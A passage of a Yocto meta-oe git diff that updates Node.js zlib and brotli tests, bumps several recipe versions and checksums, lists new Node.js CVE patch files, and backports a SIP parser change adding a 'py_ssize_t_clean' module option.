fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bffcfffff7ff82700e2b00040f7fe9ffffffff04f00c4610180eefd3fffffffe19f0088c30200ddfb7ffeffffc33f0110870500baf7fffcffff877f02200e0b0074effff9ffff0fff04401c1600e8defff3ffff1ffe0980382c00d0bdffe7ffff3ffc1300715800a07bff3f'; ++ ++const buf = Buffer.from(content, 'hex'); ++ ++const decoder = createBrotliDecompress(); ++decoder.end(buf); ++ ++// We need to wait to verify that the libuv thread pool had time ++// to process the data and the buffer is not empty. ++setTimeout(common.mustCall(() => { ++ // There is only one chunk in the buffer ++ strictEqual(decoder._readableState.buffer.length, 1); ++}), common.platformTimeout(100)); +diff --git a/test/parallel/test-zlib-params.js b/test/parallel/test-zlib-params.js +index 30d4f13..18271fe 100644 +--- a/test/parallel/test-zlib-params.js ++++ b/test/parallel/test-zlib-params.js +@@ -12,23 +12,29 @@ const deflater = zlib.createDeflate(opts); + const chunk1 = file.slice(0, chunkSize); + const chunk2 = file.slice(chunkSize); + const blkhdr = Buffer.from([0x00, 0x5a, 0x82, 0xa5, 0x7d]); +-const expected = Buffer.concat([blkhdr, chunk2]); +-let actual; ++const blkftr = Buffer.from('010000ffff7dac3072', 'hex'); ++const expected = Buffer.concat([blkhdr, chunk2, blkftr]); ++const bufs = []; ++ ++function read() { ++ let buf; ++ while ((buf = deflater.read()) !== null) { ++ bufs.push(buf); ++ } ++} + + deflater.write(chunk1, function() { + deflater.params(0, zlib.constants.Z_DEFAULT_STRATEGY, function() { + while (deflater.read()); +- deflater.end(chunk2, function() { +- const bufs = []; +- let buf; +- while ((buf = deflater.read()) !== null) +- bufs.push(buf); +- actual = Buffer.concat(bufs); +- }); ++ ++ deflater.on('readable', read); ++ ++ deflater.end(chunk2); + }); + while (deflater.read()); + }); + + process.once('exit', function() { ++ const actual = Buffer.concat(bufs); + assert.deepStrictEqual(actual, expected); + }); +-- +2.40.0 diff --git a/meta-oe/recipes-devtools/nodejs/nodejs_16.14.2.bb b/meta-oe/recipes-devtools/nodejs/nodejs_16.20.2.bb index 62188f94a7..95b36c926d 100644 --- a/meta-oe/recipes-devtools/nodejs/nodejs_16.14.2.bb +++ b/meta-oe/recipes-devtools/nodejs/nodejs_16.20.2.bb @@ -1,13 +1,13 @@ DESCRIPTION = "nodeJS Evented I/O for V8 JavaScript" HOMEPAGE = "http://nodejs.org" -LICENSE = "MIT & ISC & BSD-2-Clause & BSD-3-Clause & Artistic-2.0" -LIC_FILES_CHKSUM = "file://LICENSE;md5=6ba5b21ac7a505195ca69344d3d7a94a" +LICENSE = "MIT & ISC & BSD-2-Clause & BSD-3-Clause & Artistic-2.0 & OpenSSL" +LIC_FILES_CHKSUM = "file://LICENSE;md5=ab4d0d45e717c9978737499a3489e515" DEPENDS = "openssl" DEPENDS:append:class-target = " qemu-native" DEPENDS:append:class-native = " c-ares-native" -inherit pkgconfig python3native qemu +inherit pkgconfig python3native qemu setuptools3 COMPATIBLE_MACHINE:armv4 = "(!.*armv4).*" COMPATIBLE_MACHINE:armv5 = "(!.*armv5).*" @@ -19,17 +19,20 @@ COMPATIBLE_HOST:powerpc = "null" SRC_URI = "http://nodejs.org/dist/v${PV}/node-v${PV}.tar.xz \ file://0001-Disable-running-gyp-files-for-bundled-deps.patch \ - file://0002-Install-both-binaries-and-use-libdir.patch \ file://0004-v8-don-t-override-ARM-CFLAGS.patch \ - file://0005-add-openssl-legacy-provider-option.patch \ file://big-endian.patch \ file://mips-less-memory.patch \ file://system-c-ares.patch \ file://0001-liftoff-Correct-function-signatures.patch \ file://0001-mips-Use-32bit-cast-for-operand-on-mips32.patch \ + file://0001-Nodejs-Fixed-pipes-DeprecationWarning.patch \ + file://CVE-2022-25883.patch \ + file://CVE-2024-22019.patch \ + file://CVE-2024-22025.patch \ + file://CVE-2023-46809.patch \ " SRC_URI:append:class-target = " \ - file://0002-Using-native-binaries.patch \ + file://0001-Using-native-binaries.patch \ " SRC_URI:append:toolchain-clang:x86 = " \ file://libatomic.patch \ @@ -37,10 +40,12 @@ SRC_URI:append:toolchain-clang:x86 = " \ SRC_URI:append:toolchain-clang:powerpc64le = " \ file://0001-ppc64-Do-not-use-mminimal-toc-with-clang.patch \ " -SRC_URI[sha256sum] = "e922e215cc68eb5f94d33e8a0b61e2c863b7731cc8600ab955d3822da90ff8d1" +SRC_URI[sha256sum] = "576f1a03c455e491a8d132b587eb6b3b84651fc8974bb3638433dd44d22c8f49" S = "${WORKDIR}/node-v${PV}" +CVE_PRODUCT += "node.js" + # v8 errors out if you have set CCACHE CCACHE = "" diff --git a/meta-oe/recipes-devtools/pahole/pahole_1.22.bb b/meta-oe/recipes-devtools/pahole/pahole_1.22.bb index 449508a5d5..ec642ec3b2 100644 --- a/meta-oe/recipes-devtools/pahole/pahole_1.22.bb +++ b/meta-oe/recipes-devtools/pahole/pahole_1.22.bb @@ -21,7 +21,7 @@ inherit cmake pkgconfig PACKAGECONFIG[python3] = ",,python3-core,python3-core" -EXTRA_OECMAKE = "-D__LIB=lib -DCMAKE_BUILD_TYPE=Release -DLIBBPF_EMBEDDED=OFF" +EXTRA_OECMAKE = "-D__LIB=${@os.path.relpath(d.getVar('libdir'), d.getVar('prefix') + '/')} -DCMAKE_BUILD_TYPE=Release -DLIBBPF_EMBEDDED=OFF" FILES:${PN} = "${bindir}/pahole \ ${libdir}/libdwarves.so* \ diff --git a/meta-oe/recipes-devtools/php/php_8.1.10.bb b/meta-oe/recipes-devtools/php/php_8.1.22.bb index 624ab2621a..ffa3318441 100644 --- a/meta-oe/recipes-devtools/php/php_8.1.10.bb +++ b/meta-oe/recipes-devtools/php/php_8.1.22.bb @@ -33,7 +33,7 @@ SRC_URI:append:class-target = " \ " S = "${WORKDIR}/php-${PV}" -SRC_URI[sha256sum] = "2de8e0402285f7c56887defe651922308aded58ba60befcf3b77720209e31f10" +SRC_URI[sha256sum] = "992354e382c6c618d01ed4be06beea8dec3178b14153df64d3c8c48b85e9fbc2" CVE_CHECK_IGNORE += "\ CVE-2007-2728 \ diff --git a/meta-oe/recipes-devtools/protobuf/protobuf_3.19.4.bb b/meta-oe/recipes-devtools/protobuf/protobuf_3.19.6.bb index 5662330840..8e50054718 100644 --- a/meta-oe/recipes-devtools/protobuf/protobuf_3.19.4.bb +++ b/meta-oe/recipes-devtools/protobuf/protobuf_3.19.6.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=37b5762e07f0af8c74ce80a8bda4266b" DEPENDS = "zlib" DEPENDS:append:class-target = " protobuf-native" -SRCREV = "22d0e265de7d2b3d2e9a00d071313502e7d4cccf" +SRCREV = "c9297981b7c35ad9c2bf258e7c8d786a04d13378" SRC_URI = "git://github.com/protocolbuffers/protobuf.git;branch=3.19.x;protocol=https \ file://run-ptest \ diff --git a/meta-oe/recipes-devtools/rapidjson/rapidjson_git.bb b/meta-oe/recipes-devtools/rapidjson/rapidjson_git.bb index b6ff62b91c..65294fafad 100644 --- a/meta-oe/recipes-devtools/rapidjson/rapidjson_git.bb +++ b/meta-oe/recipes-devtools/rapidjson/rapidjson_git.bb @@ -4,7 +4,7 @@ SECTION = "libs" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://license.txt;md5=ba04aa8f65de1396a7e59d1d746c2125" -SRC_URI = "git://github.com/miloyip/rapidjson.git;nobranch=1;protocol=https" +SRC_URI = "git://github.com/miloyip/rapidjson.git;branch=master;protocol=https" SRCREV = "0ccdbf364c577803e2a751f5aededce935314313" diff --git a/meta-oe/recipes-devtools/sip/sip3/added-the-py_ssize_t_clean-argument-to-the-module-directive.patch b/meta-oe/recipes-devtools/sip/sip3/added-the-py_ssize_t_clean-argument-to-the-module-directive.patch new file mode 100644 index 0000000000..d7ed0770b2 --- /dev/null +++ b/meta-oe/recipes-devtools/sip/sip3/added-the-py_ssize_t_clean-argument-to-the-module-directive.patch @@ -0,0 +1,17679 @@ +Added the 'py_ssize_t_clean' argument to '%Module' directive + +This is based on an upstream changeset to SIP. It was backported to +sip-4.19.23 and the parser was regenerated with the following +commands: + + cd sipgen/metasrc + flex -o../lexer.c lexer.l + bison -y -d -o ../parser.c parser.y + +Signed-off-by: Rob Woolley <rob.woolley@windriver.com> + +# HG changeset patch +# User Phil Thompson <phil@riverbankcomputing.com> +# Date 1635086052 -3600 +# Node ID 5d67349bb5a9954590a896ab35da93b2237b99c2 +# Parent d837f2a3147fc5eb364f1c54798b668da1a83333 +Added the 'py_ssize_t_clean' argument to the '%Module' directive. + +Index: sip-4.19.23/sipgen/gencode.c +=================================================================== +--- sip-4.19.23.orig/sipgen/gencode.c ++++ sip-4.19.23/sipgen/gencode.c +@@ -1138,6 +1138,12 @@ static void generateCompositeCpp(sipSpec + + declareLimitedAPI(py_debug, NULL, fp); + ++ if (isPY_SSIZE_T_CLEAN(mod)) ++ prcode(fp, ++"\n" ++"#define PY_SSIZE_T_CLEAN\n" ++ ); ++ + prcode(fp, + "\n" + "#include <Python.h>\n" +Index: sip-4.19.23/sipgen/metasrc/lexer.l +=================================================================== +--- sip-4.19.23.orig/sipgen/metasrc/lexer.l ++++ sip-4.19.23/sipgen/metasrc/lexer.l +@@ -155,6 +155,7 @@ SIP_RXOBJ_DIS {return TK_S + SIP_SLOT_CON {return TK_SIPSLOTCON;} + SIP_SLOT_DIS {return TK_SIPSLOTDIS;} + SIP_SSIZE_T {return TK_SIPSSIZET;} ++Py_ssize_t {return TK_SIPSSIZET;} + SIP_QOBJECT {return TK_QOBJECT;} + \.\.\. {return TK_ELLIPSIS;} + +@@ -173,6 +174,7 @@ SIP_QOBJECT {return TK_Q + <directive>timestamp {return TK_TIMESTAMP;} + <directive>type {return TK_TYPE;} + <directive>use_argument_names {return TK_USEARGNAMES;} ++<directive>py_ssize_t_clean {return TK_PYSSIZETCLEAN;} + <directive>use_limited_api {return TK_USELIMITEDAPI;} + <directive>all_raise_py_exception {return TK_ALLRAISEPYEXC;} + <directive>call_super_init {return TK_CALLSUPERINIT;} +Index: sip-4.19.23/sipgen/metasrc/parser.y +=================================================================== +--- sip-4.19.23.orig/sipgen/metasrc/parser.y ++++ sip-4.19.23/sipgen/metasrc/parser.y +@@ -182,9 +182,9 @@ static void addProperty(sipSpec *pt, mod + docstringDef *docstring); + static moduleDef *configureModule(sipSpec *pt, moduleDef *module, + const char *filename, const char *name, int c_module, KwArgs kwargs, +- int use_arg_names, int use_limited_api, int call_super_init, +- int all_raise_py_exc, const char *def_error_handler, +- docstringDef *docstring); ++ int use_arg_names, int py_ssize_t_clean, int use_limited_api, ++ int call_super_init, int all_raise_py_exc, ++ const char *def_error_handler, docstringDef *docstring); + static void addAutoPyName(moduleDef *mod, const char *remove_leading); + static KwArgs convertKwArgs(const char *kwargs); + static void checkAnnos(optFlags *annos, const char *valid[]); +@@ -389,6 +389,7 @@ static scopedNameDef *fullyQualifiedName + %token TK_TIMESTAMP + %token TK_TYPE + %token TK_USEARGNAMES ++%token TK_PYSSIZETCLEAN + %token TK_USELIMITEDAPI + %token TK_ALLRAISEPYEXC + %token TK_CALLSUPERINIT +@@ -1908,9 +1909,10 @@ module: TK_MODULE module_args module_bod + if (notSkipping()) + currentModule = configureModule(currentSpec, currentModule, + currentContext.filename, $2.name, $2.c_module, +- $2.kwargs, $2.use_arg_names, $2.use_limited_api, +- $2.call_super_init, $2.all_raise_py_exc, +- $2.def_error_handler, $3.docstring); ++ $2.kwargs, $2.use_arg_names, $2.py_ssize_t_clean, ++ $2.use_limited_api, $2.call_super_init, ++ $2.all_raise_py_exc, $2.def_error_handler, ++ $3.docstring); + } + | TK_CMODULE dottedname optnumber { + deprecated("%CModule is deprecated, use %Module and the 'language' argument instead"); +@@ -1918,7 +1920,7 @@ module: TK_MODULE module_args module_bod + if (notSkipping()) + currentModule = configureModule(currentSpec, currentModule, + currentContext.filename, $2, TRUE, defaultKwArgs, +- FALSE, FALSE, -1, FALSE, NULL, NULL); ++ FALSE, FALSE, FALSE, -1, FALSE, NULL, NULL); + } + ; + +@@ -1930,6 +1932,7 @@ module_args: dottedname {resetLexerSt + $$.kwargs = defaultKwArgs; + $$.name = $1; + $$.use_arg_names = FALSE; ++ $$.py_ssize_t_clean = FALSE; + $$.use_limited_api = FALSE; + $$.all_raise_py_exc = FALSE; + $$.call_super_init = -1; +@@ -1950,6 +1953,7 @@ module_arg_list: module_arg + case TK_LANGUAGE: $$.c_module = $3.c_module; break; + case TK_NAME: $$.name = $3.name; break; + case TK_USEARGNAMES: $$.use_arg_names = $3.use_arg_names; break; ++ case TK_PYSSIZETCLEAN: $$.py_ssize_t_clean = $3.py_ssize_t_clean; break; + case TK_USELIMITEDAPI: $$.use_limited_api = $3.use_limited_api; break; + case TK_ALLRAISEPYEXC: $$.all_raise_py_exc = $3.all_raise_py_exc; break; + case TK_CALLSUPERINIT: $$.call_super_init = $3.call_super_init; break; +@@ -1965,6 +1969,7 